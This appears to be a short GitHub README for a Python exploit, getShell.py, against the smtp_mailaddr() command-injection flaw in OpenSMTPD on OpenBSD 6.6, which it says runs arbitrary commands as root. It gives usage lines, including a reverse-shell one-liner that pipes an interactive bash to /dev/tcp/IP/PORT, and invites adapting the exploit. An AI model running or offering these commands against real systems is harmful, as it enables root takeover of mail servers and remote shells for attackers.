
This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user

Primary LanguagePython


This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user

How to use?

python3 getShell.py <targetIp> <targetPort> <command>

If you need a reverse shell then run it like this

python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'


Change some stuffs in this exploit like RCPT to and something(if needed)

See this article for more clear explaination
